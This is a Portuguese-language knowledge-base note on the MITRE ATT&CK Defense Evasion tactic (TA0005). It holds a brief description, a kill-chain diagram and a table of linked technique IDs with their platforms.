# TA0005 — Defense Evasion ## Descrição A Evasão de Defesas é a tática com **maior número de técnicas** no framework MITRE ATT&CK Enterprise — um reflexo de quão central ela é para operações adversariais modernas. O adversário precisa permanecer oculto não apenas na entrada, mas durante toda a operação. Cada ferramenta de segurança ativa — EDR, antivírus, SIEM, IDS — representa um obstáculo a contornar. As abordagens de evasão incluem: **ofuscação de código** ([[t1027-obfuscated-files|T1027]]), **mascaramento de processos** ([[t1036-masquerading|T1036]]), **desabilitação de ferramentas de segurança** ([[t1562-001-disable-tools|T1562.001]]), **remoção de evidências** ([[t1070-indicator-removal|T1070]]) e **execução via binários legítimos do sistema** ([[t1218-system-binary-proxy-execution|T1218]]). Adversários como [[g0016-apt29|APT29]] combinam múltiplas técnicas de evasão simultaneamente — tornando a detecção por regras estáticas práticamente impossível. O Living Off the Land (LOTL) — usar ferramentas legítimas do SO para fins maliciosos — é a estratégia de evasão padrão de grupos nação-estado avançados como [[g1017-volt-typhoon|Volt Typhoon]], que opera exclusivamente com ferramentas como wmic, netsh e ntdsutil para evitar qualquer artefato detectável por antivírus. ## Posição no Kill Chain ```mermaid graph TB R["Reconhecimento"]:::inactive --> RD["Desenvolvimento<br/>de Recursos"]:::inactive RD --> IA["Acesso Inicial"]:::inactive IA --> EX["Execução"]:::inactive EX --> PE["Persistência"]:::inactive PE --> PR["Esc. Privilégios"]:::inactive PR --> DE["🛡️ Evasão de Defesas"]:::active DE --> CA["Acesso a<br/>Credenciais"]:::inactive CA --> DI["Descoberta"]:::inactive DI --> LM["Mov. Lateral"]:::inactive LM --> CO["Coleta"]:::inactive CO --> C2["Comando e<br/>Controle"]:::inactive C2 --> EXF["Exfiltração"]:::inactive EXF --> IM["Impacto"]:::inactive classDef active fill:#e74c3c,color:#fff,stroke:#c0392b,stroke-width:3px classDef inactive fill:#2c3e50,color:#95a5a6,stroke:#1a252f ``` ## Técnicas desta Tática no Vault %% ```dataview TABLE WITHOUT ID link(file.link, title) AS "Nota", mitre-id AS "ID", title AS "Técnica", platforms AS "Plataformas" FROM "ttp/techniques" WHERE contains(mitre-tactic, "Defense Evasion") SORT mitre-id ASC ``` %% <!-- QueryToSerialize: TABLE WITHOUT ID link(file.link, title) AS "Nota", mitre-id AS "ID", title AS "Técnica", platforms AS "Plataformas" FROM "ttp/techniques" WHERE contains(mitre-tactic, "Defense Evasion") SORT mitre-id ASC --> <!-- SerializedQuery: TABLE WITHOUT ID link(file.link, title) AS "Nota", mitre-id AS "ID", title AS "Técnica", platforms AS "Plataformas" FROM "ttp/techniques" WHERE contains(mitre-tactic, "Defense Evasion") SORT mitre-id ASC --> | Nota | ID | Técnica | Plataformas | | -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | --------- | --------------------------------------------------------------------------- | -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | | [[t1006-direct-volume-access\|T1006 - Direct Volume Access]] | T1006 | T1006 - Direct Volume Access | <ul><li>Network Devices</li><li>Windows</li></ul> | | [[t1014-rootkit\|T1014 - Rootkit]] | T1014 | T1014 - Rootkit | <ul><li>Linux</li><li>macOS</li><li>Windows</li></ul> | | [[t1027-obfuscated-files-or-information\|T1027 - Obfuscated Files or Information]] | T1027 | T1027 - Obfuscated Files or Information | <ul><li>ESXi</li><li>Linux</li><li>macOS</li><li>Network Devices</li><li>Windows</li></ul> | | [[t1027-obfuscated-files\|T1027 - Obfuscated Files or Information]] | T1027 | T1027 - Obfuscated Files or Information | <ul><li>Windows</li><li>Linux</li><li>macOS</li></ul> | | [[t1027-001-binary-padding\|T1027.001 - Binary Padding]] | T1027.001 | T1027.001 - Binary Padding | <ul><li>Linux</li><li>Windows</li><li>macOS</li></ul> | | [[t1027-002-software-packing\|T1027.002 - Software Packing]] | T1027.002 | T1027.002 - Software Packing | <ul><li>Linux</li><li>macOS</li><li>Windows</li></ul> | | [[t1027-003-steganography\|T1027.003 - Steganography]] | T1027.003 | T1027.003 - Steganography | <ul><li>Linux</li><li>macOS</li><li>Windows</li></ul> | | [[t1027-004-compile-after-delivery\|T1027.004 - Compile After Delivery]] | T1027.004 | T1027.004 - Compile After Delivery | <ul><li>Linux</li><li>macOS</li><li>Windows</li></ul> | | [[t1027-005-indicator-removal-from-tools\|T1027.005 - Indicator Removal from Tools]] | T1027.005 | T1027.005 - Indicator Removal from Tools | <ul><li>Linux</li><li>macOS</li><li>Windows</li></ul> | | [[t1027-006-html-smuggling\|T1027.006 - HTML Smuggling]] | T1027.006 | T1027.006 - HTML Smuggling | <ul><li>Windows</li><li>Linux</li><li>macOS</li></ul> | | [[t1027-007-dynamic-api-resolution\|T1027.007 - Dynamic API Resolution]] | T1027.007 | T1027.007 - Dynamic API Resolution | <ul><li>Windows</li></ul> | | [[t1027-008-stripped-payloads\|T1027.008 - Stripped Payloads]] | T1027.008 | T1027.008 - Stripped Payloads | <ul><li>macOS</li><li>Linux</li><li>Windows</li><li>Network Devices</li></ul> | | [[t1027-009-embedded-payloads\|T1027.009 - Embedded Payloads]] | T1027.009 | T1027.009 - Embedded Payloads | <ul><li>Linux</li><li>macOS</li><li>Windows</li></ul> | | [[t1027-010-command-obfuscation\|T1027.010 - Command Obfuscation]] | T1027.010 | T1027.010 - Command Obfuscation | <ul><li>Linux</li><li>macOS</li><li>Windows</li></ul> | | [[t1027-011-fileless-storage\|T1027.011 - Fileless Storage]] | T1027.011 | T1027.011 - Fileless Storage | <ul><li>Windows</li><li>Linux</li></ul> | | [[t1027-012-lnk-icon-smuggling\|T1027.012 - LNK Icon Smuggling]] | T1027.012 | T1027.012 - LNK Icon Smuggling | <ul><li>Windows</li></ul> | | [[t1027-013-encryptedencoded-file\|T1027.013 - Encrypted/Encoded File]] | T1027.013 | T1027.013 - Encrypted/Encoded File | <ul><li>Linux</li><li>macOS</li><li>Windows</li></ul> | | [[t1027-014-polymorphic-code\|T1027.014 - Polymorphic Code]] | T1027.014 | T1027.014 - Polymorphic Code | <ul><li>Windows</li><li>macOS</li><li>Linux</li></ul> | | [[t1027-015-compression\|T1027.015 - Compression]] | T1027.015 | T1027.015 - Compression | <ul><li>Linux</li><li>Windows</li><li>macOS</li></ul> | | [[t1027-016-junk-code-insertion\|T1027.016 - Junk Code Insertion]] | T1027.016 | T1027.016 - Junk Code Insertion | <ul><li>Linux</li><li>macOS</li><li>Windows</li></ul> | | [[t1027-017-svg-smuggling\|T1027.017 - SVG Smuggling]] | T1027.017 | T1027.017 - SVG Smuggling | <ul><li>Linux</li><li>macOS</li><li>Windows</li></ul> | | [[t1036-masquerading\|T1036 - Masquerading]] | T1036 | T1036 - Masquerading | <ul><li>Containers</li><li>ESXi</li><li>Linux</li><li>macOS</li><li>Windows</li></ul> | | [[t1036-001-invalid-code-signature\|T1036.001 - Invalid Code Signature]] | T1036.001 | T1036.001 - Invalid Code Signature | <ul><li>Windows</li><li>macOS</li></ul> | | [[t1036-002-right-to-left-override\|T1036.002 - Right-to-Left Override]] | T1036.002 | T1036.002 - Right-to-Left Override | <ul><li>Linux</li><li>macOS</li><li>Windows</li></ul> | | [[t1036-003-rename-legitimate-utilities\|T1036.003 - Rename Legitimaté Utilities]] | T1036.003 | T1036.003 - Rename Legitimaté Utilities | <ul><li>Linux</li><li>macOS</li><li>Windows</li></ul> | | [[t1036-004-masquerade-task-or-service\|T1036.004 - Masquerade Task or Service]] | T1036.004 | T1036.004 - Masquerade Task or Service | <ul><li>Linux</li><li>macOS</li><li>Windows</li></ul> | | [[t1036-005-match-legitimate-resource-name-or-location\|T1036.005 - Match Legitimaté Resource Name or Location]] | T1036.005 | T1036.005 - Match Legitimaté Resource Name or Location | <ul><li>Containers</li><li>ESXi</li><li>Linux</li><li>macOS</li><li>Windows</li></ul> | | [[t1036-006-space-after-filename\|T1036.006 - Space after Filename]] | T1036.006 | T1036.006 - Space after Filename | <ul><li>Linux</li><li>macOS</li></ul> | | [[t1036-007-double-file-extension\|T1036.007 - Double File Extension]] | T1036.007 | T1036.007 - Double File Extension | <ul><li>Windows</li></ul> | | [[t1036-008-masquerade-file-type\|T1036.008 - Masquerade File Type]] | T1036.008 | T1036.008 - Masquerade File Type | <ul><li>Linux</li><li>macOS</li><li>Windows</li></ul> | | [[t1036-009-break-process-trees\|T1036.009 - Break Process Trees]] | T1036.009 | T1036.009 - Break Process Trees | <ul><li>Linux</li><li>macOS</li></ul> | | [[t1036-010-masquerade-account-name\|T1036.010 - Masquerade Account Name]] | T1036.010 | T1036.010 - Masquerade Account Name | <ul><li>Linux</li><li>macOS</li><li>Windows</li><li>SaaS</li><li>IaaS</li><li>Containers</li><li>Office Suite</li><li>Identity Provider</li></ul> | | [[t1036-011-overwrite-process-arguments\|T1036.011 - Overwrite Process Arguments]] | T1036.011 | T1036.011 - Overwrite Process Arguments | <ul><li>Linux</li></ul> | | [[t1036-012-browser-fingerprint\|T1036.012 - Browser Fingerprint]] | T1036.012 | T1036.012 - Browser Fingerprint | <ul><li>Linux</li><li>macOS</li><li>Windows</li></ul> | | [[t1055-process-injection\|T1055 - Process Injection]] | T1055 | T1055 - Process Injection | <ul><li>Linux</li><li>macOS</li><li>Windows</li></ul> | | [[t1055-001-dynamic-link-library-injection\|T1055.001 - Dynamic-link Library Injection]] | T1055.001 | T1055.001 - Dynamic-link Library Injection | <ul><li>Windows</li></ul> | | [[t1055-002-portable-executable-injection\|T1055.002 - Portable Executable Injection]] | T1055.002 | T1055.002 - Portable Executable Injection | <ul><li>Windows</li></ul> | | [[t1055-003-thread-execution-hijacking\|T1055.003 - Thread Execution Hijacking]] | T1055.003 | T1055.003 - Thread Execution Hijacking | <ul><li>Windows</li></ul> | | [[t1055-004-asynchronous-procedure-call\|T1055.004 - Asynchronous Procedure Call]] | T1055.004 | T1055.004 - Asynchronous Procedure Call | <ul><li>Windows</li></ul> | | [[t1055-005-thread-local-storage\|T1055.005 - Thread Local Storage]] | T1055.005 | T1055.005 - Thread Local Storage | <ul><li>Windows</li></ul> | | [[t1055-008-ptrace-system-calls\|T1055.008 - Ptrace System Calls]] | T1055.008 | T1055.008 - Ptrace System Calls | <ul><li>Linux</li></ul> | | [[t1055-009-proc-memory\|T1055.009 - Proc Memory]] | T1055.009 | T1055.009 - Proc Memory | <ul><li>Linux</li></ul> | | [[t1055-011-extra-window-memory-injection\|T1055.011 - Extra Window Memory Injection]] | T1055.011 | T1055.011 - Extra Window Memory Injection | <ul><li>Windows</li></ul> | | [[t1055-012-process-hollowing\|T1055.012 - Process Hollowing]] | T1055.012 | T1055.012 - Process Hollowing | <ul><li>Windows</li></ul> | | [[t1055-013-process-doppelgnging\|T1055.013 - Process Doppelgänging]] | T1055.013 | T1055.013 - Process Doppelgänging | <ul><li>Windows</li></ul> | | [[t1055-014-vdso-hijacking\|T1055.014 - VDSO Hijacking]] | T1055.014 | T1055.014 - VDSO Hijacking | <ul><li>Linux</li></ul> | | [[t1055-015-listplanting\|T1055.015 - ListPlanting]] | T1055.015 | T1055.015 - ListPlanting | <ul><li>Windows</li></ul> | | [[t1070-indicator-removal\|T1070 - Indicator Removal]] | T1070 | T1070 - Indicator Removal | <ul><li>Containers</li><li>ESXi</li><li>Linux</li><li>macOS</li><li>Network Devices</li><li>Office Suite</li><li>Windows</li></ul> | | [[t1070-001-clear-windows-event-logs\|T1070.001 - Clear Windows Event Logs]] | T1070.001 | T1070.001 - Clear Windows Event Logs | <ul><li>Windows</li></ul> | | [[t1070-002-clear-linux-or-mac-system-logs\|T1070.002 - Clear Linux or Mac System Logs]] | T1070.002 | T1070.002 - Clear Linux or Mac System Logs | <ul><li>Linux</li><li>macOS</li></ul> | | [[t1070-003-clear-command-history\|T1070.003 - Clear Command History]] | T1070.003 | T1070.003 - Clear Command History | <ul><li>ESXi</li><li>Linux</li><li>macOS</li><li>Network Devices</li><li>Windows</li></ul> | | [[t1070-004-file-deletion\|T1070.004 - File Deletion]] | T1070.004 | T1070.004 - File Deletion | <ul><li>ESXi</li><li>Linux</li><li>macOS</li><li>Windows</li></ul> | | [[t1070-005-network-share-connection-removal\|T1070.005 - Network Share Connection Removal]] | T1070.005 | T1070.005 - Network Share Connection Removal | <ul><li>Windows</li></ul> | | [[t1070-006-timestomp\|T1070.006 - Timestomp]] | T1070.006 | T1070.006 - Timestomp | <ul><li>ESXi</li><li>Linux</li><li>macOS</li><li>Windows</li></ul> | | [[t1070-007-clear-network-connection-history-and-configurations\|T1070.007 - Clear Network Connection History and Configurations]] | T1070.007 | T1070.007 - Clear Network Connection History and Configurations | <ul><li>Linux</li><li>macOS</li><li>Windows</li><li>Network Devices</li></ul> | | [[t1070-008-clear-mailbox-data\|T1070.008 - Clear Mailbox Data]] | T1070.008 | T1070.008 - Clear Mailbox Data | <ul><li>Linux</li><li>macOS</li><li>Office Suite</li><li>Windows</li></ul> | | [[t1070-009-clear-persistence\|T1070.009 - Clear Persistence]] | T1070.009 | T1070.009 - Clear Persistence | <ul><li>ESXi</li><li>Linux</li><li>Windows</li><li>macOS</li></ul> | | [[t1070-010-relocate-malware\|T1070.010 - Relocaté Malware]] | T1070.010 | T1070.010 - Relocaté Malware | <ul><li>Linux</li><li>macOS</li><li>Windows</li><li>Network Devices</li></ul> | | [[t1078-valid-accounts\|T1078 - Valid Accounts]] | T1078 | T1078 - Valid Accounts | <ul><li>Containers</li><li>ESXi</li><li>IaaS</li><li>Identity Provider</li><li>Linux</li><li>macOS</li><li>Network Devices</li><li>Office Suite</li><li>SaaS</li><li>Windows</li></ul> | | [[t1078-001-default-accounts\|T1078.001 - Default Accounts]] | T1078.001 | T1078.001 - Default Accounts | <ul><li>Windows</li><li>SaaS</li><li>IaaS</li><li>Linux</li><li>macOS</li><li>Containers</li><li>Network Devices</li><li>ESXi</li><li>Office Suite</li><li>Identity Provider</li></ul> | | [[t1078-002-domain-accounts\|T1078.002 - Domain Accounts]] | T1078.002 | T1078.002 - Domain Accounts | <ul><li>ESXi</li><li>Linux</li><li>macOS</li><li>Windows</li></ul> | | [[t1078-003-local-accounts\|T1078.003 - Local Accounts]] | T1078.003 | T1078.003 - Local Accounts | <ul><li>Linux</li><li>macOS</li><li>Windows</li><li>Containers</li><li>Network Devices</li><li>ESXi</li></ul> | | [[t1078-004-cloud-accounts\|T1078.004 - Cloud Accounts]] | T1078.004 | T1078.004 - Cloud Accounts | <ul><li>IaaS</li><li>Identity Provider</li><li>Office Suite</li><li>SaaS</li></ul> | | [[t1112-modify-registry\|T1112 - Modify Registry]] | T1112 | T1112 - Modify Registry | <ul><li>Windows</li></ul> | | [[t1127-trusted-developer-utilities-proxy-execution\|T1127 - Trusted Developer Utilities Proxy Execution]] | T1127 | T1127 - Trusted Developer Utilities Proxy Execution | <ul><li>Windows</li></ul> | | [[t1127-001-msbuild\|T1127.001 - MSBuild]] | T1127.001 | T1127.001 - MSBuild | <ul><li>Windows</li></ul> | | [[t1127-002-clickonce\|T1127.002 - ClickOnce]] | T1127.002 | T1127.002 - ClickOnce | <ul><li>Windows</li></ul> | | [[t1127-003-jamplus\|T1127.003 - JámPlus]] | T1127.003 | T1127.003 - JámPlus | <ul><li>Windows</li></ul> | | [[t1134-access-token-manipulation\|T1134 - Access Token Manipulation]] | T1134 | T1134 - Access Token Manipulation | <ul><li>Windows</li></ul> | | [[t1134-001-token-impersonationtheft\|T1134.001 - Token Impersonation/Theft]] | T1134.001 | T1134.001 - Token Impersonation/Theft | <ul><li>Windows</li></ul> | | [[t1134-002-create-process-with-token\|T1134.002 - Creaté Process with Token]] | T1134.002 | T1134.002 - Creaté Process with Token | <ul><li>Windows</li></ul> | | [[t1134-003-make-and-impersonate-token\|T1134.003 - Make and Impersonaté Token]] | T1134.003 | T1134.003 - Make and Impersonaté Token | <ul><li>Windows</li></ul> | | [[t1134-004-parent-pid-spoofing\|T1134.004 - Parent PID Spoofing]] | T1134.004 | T1134.004 - Parent PID Spoofing | <ul><li>Windows</li></ul> | | [[t1134-005-sid-history-injection\|T1134.005 - SID-History Injection]] | T1134.005 | T1134.005 - SID-History Injection | <ul><li>Windows</li></ul> | | [[t1140-deobfuscate-decode\|T1140 - Deobfuscaté/Decode Files or Information]] | T1140 | T1140 - Deobfuscaté/Decode Files or Information | <ul><li>Windows</li><li>macOS</li><li>Linux</li></ul> | | [[t1140-deobfuscatedecode-files-or-information\|T1140 - Deobfuscaté/Decode Files or Information]] | T1140 | T1140 - Deobfuscaté/Decode Files or Information | <ul><li>ESXi</li><li>Linux</li><li>macOS</li><li>Windows</li></ul> | | [[t1197-bits-jobs\|T1197 - BITS Jobs]] | T1197 | T1197 - BITS Jobs | <ul><li>Windows</li></ul> | | [[t1202-indirect-command-execution\|T1202 - Indirect Command Execution]] | T1202 | T1202 - Indirect Command Execution | <ul><li>Windows</li></ul> | | [[t1205-traffic-signaling\|T1205 - Traffic Signaling]] | T1205 | T1205 - Traffic Signaling | <ul><li>Linux</li><li>macOS</li><li>Network Devices</li><li>Windows</li></ul> | | [[t1205-001-port-knocking\|T1205.001 - Port Knocking]] | T1205.001 | T1205.001 - Port Knocking | <ul><li>Linux</li><li>macOS</li><li>Windows</li><li>Network Devices</li></ul> | | [[t1205-002-socket-filters\|T1205.002 - Socket Filters]] | T1205.002 | T1205.002 - Socket Filters | <ul><li>Linux</li><li>macOS</li><li>Windows</li></ul> | | [[t1207-rogue-domain-controller\|T1207 - Rogue Domain Controller]] | T1207 | T1207 - Rogue Domain Controller | <ul><li>Windows</li></ul> | | [[t1211-exploitation-for-defense-evasion\|T1211 - Exploitation for Defense Evasion]] | T1211 | T1211 - Exploitation for Defense Evasion | <ul><li>Linux</li><li>Windows</li><li>macOS</li><li>SaaS</li><li>IaaS</li></ul> | | [[t1216-system-script-proxy-execution\|T1216 - System Script Proxy Execution]] | T1216 | T1216 - System Script Proxy Execution | <ul><li>Windows</li></ul> | | [[t1216-001-pubprn\|T1216.001 - PubPrn]] | T1216.001 | T1216.001 - PubPrn | <ul><li>Windows</li></ul> | | [[t1216-002-syncappvpublishingserver\|T1216.002 - SyncAppvPublishingServer]] | T1216.002 | T1216.002 - SyncAppvPublishingServer | <ul><li>Windows</li></ul> | | [[t1218-system-binary-proxy-execution\|T1218 - System Binary Proxy Execution]] | T1218 | T1218 - System Binary Proxy Execution | <ul><li>Windows</li><li>Linux</li><li>macOS</li></ul> | | [[t1218-001-compiled-html-file\|T1218.001 - Compiled HTML File]] | T1218.001 | T1218.001 - Compiled HTML File | <ul><li>Windows</li></ul> | | [[t1218-002-control-panel\|T1218.002 - Control Panel]] | T1218.002 | T1218.002 - Control Panel | <ul><li>Windows</li></ul> | | [[t1218-003-cmstp\|T1218.003 - CMSTP]] | T1218.003 | T1218.003 - CMSTP | <ul><li>Windows</li></ul> | | [[t1218-004-installutil\|T1218.004 - InstallUtil]] | T1218.004 | T1218.004 - InstallUtil | <ul><li>Windows</li></ul> | | [[t1218-005-mshta\|T1218.005 - Mshta]] | T1218.005 | T1218.005 - Mshta | <ul><li>Windows</li></ul> | | [[t1218-007-msiexec\|T1218.007 - Msiexec]] | T1218.007 | T1218.007 - Msiexec | <ul><li>Windows</li></ul> | | [[t1218-008-odbcconf\|T1218.008 - Odbcconf]] | T1218.008 | T1218.008 - Odbcconf | <ul><li>Windows</li></ul> | | [[t1218-009-regsvcsregasm\|T1218.009 - Regsvcs/Regasm]] | T1218.009 | T1218.009 - Regsvcs/Regasm | <ul><li>Windows</li></ul> | | [[t1218-010-regsvr32\|T1218.010 - Regsvr32]] | T1218.010 | T1218.010 - Regsvr32 | <ul><li>Windows</li></ul> | | [[t1218-011-rundll32\|T1218.011 - Rundll32]] | T1218.011 | T1218.011 - Rundll32 | <ul><li>Windows</li></ul> | | [[t1218-012-verclsid\|T1218.012 - Verclsid]] | T1218.012 | T1218.012 - Verclsid | <ul><li>Windows</li></ul> | | [[t1218-013-mavinject\|T1218.013 - Mavinject]] | T1218.013 | T1218.013 - Mavinject | <ul><li>Windows</li></ul> | | [[t1218-014-mmc\|T1218.014 - MMC]] | T1218.014 | T1218.014 - MMC | <ul><li>Windows</li></ul> | | [[t1218-015-electron-applications\|T1218.015 - Electron Applications]] | T1218.015 | T1218.015 - Electron Applications | <ul><li>Linux</li><li>macOS</li><li>Windows</li></ul> | | [[t1220-xsl-script-processing\|T1220 - XSL Script Processing]] | T1220 | T1220 - XSL Script Processing | <ul><li>Windows</li></ul> | | [[t1221-template-injection\|T1221 - Templaté Injection]] | T1221 | T1221 - Templaté Injection | <ul><li>Windows</li></ul> | | [[t1222-file-and-directory-permissions-modification\|T1222 - File and Directory Permissions Modification]] | T1222 | T1222 - File and Directory Permissions Modification | <ul><li>ESXi</li><li>Linux</li><li>macOS</li><li>Windows</li></ul> | | [[t1222-001-windows-file-and-directory-permissions-modification\|T1222.001 - Windows File and Directory Permissions Modification]] | T1222.001 | T1222.001 - Windows File and Directory Permissions Modification | <ul><li>Windows</li></ul> | | [[t1222-002-linux-and-mac-file-and-directory-permissions-modification\|T1222.002 - Linux and Mac File and Directory Permissions Modification]] | T1222.002 | T1222.002 - Linux and Mac File and Directory Permissions Modification | <ul><li>macOS</li><li>Linux</li></ul> | | [[t1406-obfuscated-files-or-information\|T1406 - Obfuscated Files or Information]] | T1406 | T1406 - Obfuscated Files or Information | <ul><li>Android</li><li>iOS</li></ul> | | [[t1407-download-new-code-at-runtime\|T1407 - Download New Code at Runtime]] | T1407 | T1407 - Download New Code at Runtime | <ul><li>Android</li><li>iOS</li></ul> | | [[t1480-execution-guardrails\|T1480 - Execution Guardrails]] | T1480 | T1480 - Execution Guardrails | <ul><li>ESXi</li><li>Linux</li><li>macOS</li><li>Windows</li></ul> | | [[t1480-001-environmental-keying\|T1480.001 - Environmental Keying]] | T1480.001 | T1480.001 - Environmental Keying | <ul><li>Linux</li><li>Windows</li><li>macOS</li></ul> | | [[t1480-002-mutual-exclusion\|T1480.002 - Mutual Exclusion]] | T1480.002 | T1480.002 - Mutual Exclusion | <ul><li>Linux</li><li>macOS</li><li>Windows</li></ul> | | [[t1484-domain-or-tenant-policy-modification\|T1484 - Domain or Tenant Policy Modification]] | T1484 | T1484 - Domain or Tenant Policy Modification | <ul><li>Windows</li><li>Identity Provider</li></ul> | | [[t1484-001-group-policy-modification\|T1484.001 - Group Policy Modification]] | T1484.001 | T1484.001 - Group Policy Modification | <ul><li>Windows</li></ul> | | [[t1484-002-trust-modification\|T1484.002 - Trust Modification]] | T1484.002 | T1484.002 - Trust Modification | <ul><li>Identity Provider</li><li>Windows</li></ul> | | [[t1497-virtualization-evasion\|T1497 - Virtualization/Sandbox Evasion]] | T1497 | T1497 - Virtualization/Sandbox Evasion | <ul><li>Windows</li><li>macOS</li><li>Linux</li></ul> | | [[t1497-virtualizationsandbox-evasion\|T1497 - Virtualization/Sandbox Evasion]] | T1497 | T1497 - Virtualization/Sandbox Evasion | <ul><li>Linux</li><li>macOS</li><li>Windows</li></ul> | | [[t1497-001-system-checks\|T1497.001 - System Checks]] | T1497.001 | T1497.001 - System Checks | <ul><li>Linux</li><li>macOS</li><li>Windows</li></ul> | | [[t1497-002-user-activity-based-checks\|T1497.002 - User Activity Based Checks]] | T1497.002 | T1497.002 - User Activity Based Checks | <ul><li>Linux</li><li>Windows</li><li>macOS</li></ul> | | [[t1497-003-time-based-checks\|T1497.003 - Time Based Checks]] | T1497.003 | T1497.003 - Time Based Checks | <ul><li>Linux</li><li>macOS</li><li>Windows</li></ul> | | [[t1508-suppress-application-icon\|T1508 - Suppress Application Icon]] | T1508 | T1508 - Suppress Application Icon | <ul><li>Android</li></ul> | | [[t1535-unusedunsupported-cloud-regions\|T1535 - Unused/Unsupported Cloud Regions]] | T1535 | T1535 - Unused/Unsupported Cloud Regions | <ul><li>IaaS</li></ul> | | [[t1542-pre-os-boot\|T1542 - Pre-OS Boot]] | T1542 | T1542 - Pre-OS Boot | <ul><li>Linux</li><li>Network Devices</li><li>Windows</li><li>macOS</li></ul> | | [[t1542-004-rommonkit\|T1542.004 - ROMMONkit]] | T1542.004 | T1542.004 - ROMMONkit | <ul><li>Network Devices</li></ul> | | [[t1542-005-tftp-boot\|T1542.005 - TFTP Boot]] | T1542.005 | T1542.005 - TFTP Boot | <ul><li>Network Devices</li></ul> | | [[t1548-006-tcc-manipulation\|T1548.006 - TCC Manipulation]] | T1548.006 | T1548.006 - TCC Manipulation | <ul><li>macOS</li></ul> | | [[t1550-use-alternate-authentication-material\|T1550 - Use Alternaté Authentication Material]] | T1550 | T1550 - Use Alternaté Authentication Material | <ul><li>Windows</li><li>SaaS</li><li>IaaS</li><li>Containers</li><li>Identity Provider</li><li>Office Suite</li><li>Linux</li></ul> | | [[t1550-001-app-access-token\|T1550.001 - Use Alternaté Authentication Material: Application Access Token]] | T1550.001 | T1550.001 - Use Alternaté Authentication Material: Application Access Token | <ul><li>SaaS</li><li>Office 365</li><li>Google Workspace</li><li>Azure AD</li></ul> | | [[t1550-001-application-access-token\|T1550.001 - Application Access Token]] | T1550.001 | T1550.001 - Application Access Token | <ul><li>SaaS</li><li>Containers</li><li>IaaS</li><li>Office Suite</li><li>Identity Provider</li></ul> | | [[t1550-002-pass-the-hash\|T1550.002 - Pass the Hash]] | T1550.002 | T1550.002 - Pass the Hash | <ul><li>Windows</li></ul> | | [[t1550-003-pass-the-ticket\|T1550.003 - Pass the Ticket]] | T1550.003 | T1550.003 - Pass the Ticket | <ul><li>Windows</li></ul> | | [[t1550-004-web-session-cookie\|T1550.004 - Web Session Cookie]] | T1550.004 | T1550.004 - Web Session Cookie | <ul><li>SaaS</li><li>IaaS</li><li>Office Suite</li></ul> | | [[t1553-subvert-trust-controls\|T1553 - Subvert Trust Controls]] | T1553 | T1553 - Subvert Trust Controls | <ul><li>Windows</li><li>macOS</li><li>Linux</li></ul> | | [[t1553-001-gatekeeper-bypass\|T1553.001 - Gatekeeper Bypass]] | T1553.001 | T1553.001 - Gatekeeper Bypass | <ul><li>macOS</li></ul> | | [[t1553-002-code-signing\|T1553.002 - Code Signing]] | T1553.002 | T1553.002 - Code Signing | <ul><li>macOS</li><li>Windows</li></ul> | | [[t1553-003-sip-and-trust-provider-hijacking\|T1553.003 - SIP and Trust Provider Hijacking]] | T1553.003 | T1553.003 - SIP and Trust Provider Hijacking | <ul><li>Windows</li></ul> | | [[t1553-004-install-root-certificate\|T1553.004 - Install Root Certificaté]] | T1553.004 | T1553.004 - Install Root Certificaté | <ul><li>Linux</li><li>macOS</li><li>Windows</li></ul> | | [[t1553-005-mark-of-the-web-bypass\|T1553.005 - Mark-of-the-Web Bypass]] | T1553.005 | T1553.005 - Mark-of-the-Web Bypass | <ul><li>Windows</li></ul> | | [[t1553-006-code-signing-policy-modification\|T1553.006 - Code Signing Policy Modification]] | T1553.006 | T1553.006 - Code Signing Policy Modification | <ul><li>Windows</li><li>macOS</li></ul> | | [[t1562-impair-defenses\|T1562 - Impair Defenses]] | T1562 | T1562 - Impair Defenses | <ul><li>Windows</li><li>IaaS</li><li>Linux</li><li>macOS</li><li>Containers</li><li>Network Devices</li><li>Identity Provider</li><li>Office Suite</li><li>ESXi</li></ul> | | [[t1562-001-disable-or-modify-tools\|T1562.001 - Disable or Modify Tools]] | T1562.001 | T1562.001 - Disable or Modify Tools | <ul><li>Containers</li><li>IaaS</li><li>Linux</li><li>macOS</li><li>Network Devices</li><li>Windows</li></ul> | | [[t1562-001-disable-tools\|T1562.001 - Disable or Modify Tools]] | T1562.001 | T1562.001 - Disable or Modify Tools | <ul><li>Windows</li><li>macOS</li><li>Linux</li></ul> | | [[t1562-001-impair-defenses-disable-or-modify-tools\|T1562.001 - Impair Defenses: Disable or Modify Tools]] | T1562.001 | T1562.001 - Impair Defenses: Disable or Modify Tools | <ul><li>Windows</li><li>Linux</li><li>macOS</li></ul> | | [[t1562-002-disable-windows-event-logging\|T1562.002 - Disable Windows Event Logging]] | T1562.002 | T1562.002 - Disable Windows Event Logging | <ul><li>Windows</li></ul> | | [[t1562-003-impair-command-history-logging\|T1562.003 - Impair Command History Logging]] | T1562.003 | T1562.003 - Impair Command History Logging | <ul><li>ESXi</li><li>Linux</li><li>macOS</li><li>Network Devices</li><li>Windows</li></ul> | | [[t1562-004-disable-or-modify-system-firewall\|T1562.004 - Disable or Modify System Firewall]] | T1562.004 | T1562.004 - Disable or Modify System Firewall | <ul><li>ESXi</li><li>Linux</li><li>macOS</li><li>Network Devices</li><li>Windows</li></ul> | | [[t1562-006-indicator-blocking\|T1562.006 - Indicator Blocking]] | T1562.006 | T1562.006 - Indicator Blocking | <ul><li>Windows</li><li>macOS</li><li>Linux</li><li>ESXi</li></ul> | | [[t1562-007-disable-or-modify-cloud-firewall\|T1562.007 - Disable or Modify Cloud Firewall]] | T1562.007 | T1562.007 - Disable or Modify Cloud Firewall | <ul><li>IaaS</li></ul> | | [[t1562-008-disable-or-modify-cloud-logs\|T1562.008 - Disable or Modify Cloud Logs]] | T1562.008 | T1562.008 - Disable or Modify Cloud Logs | <ul><li>IaaS</li><li>SaaS</li><li>Office Suite</li><li>Identity Provider</li></ul> | | [[t1562-009-safe-mode-boot\|T1562.009 - Safe Mode Boot]] | T1562.009 | T1562.009 - Safe Mode Boot | <ul><li>Windows</li></ul> | | [[t1562-010-downgrade-attack\|T1562.010 - Downgrade Attack]] | T1562.010 | T1562.010 - Downgrade Attack | <ul><li>Windows</li><li>Linux</li><li>macOS</li></ul> | | [[t1562-011-spoof-security-alerting\|T1562.011 - Spoof Security Alerting]] | T1562.011 | T1562.011 - Spoof Security Alerting | <ul><li>Windows</li><li>macOS</li><li>Linux</li></ul> | | [[t1562-012-disable-or-modify-linux-audit-system\|T1562.012 - Disable or Modify Linux Audit System]] | T1562.012 | T1562.012 - Disable or Modify Linux Audit System | <ul><li>Linux</li></ul> | 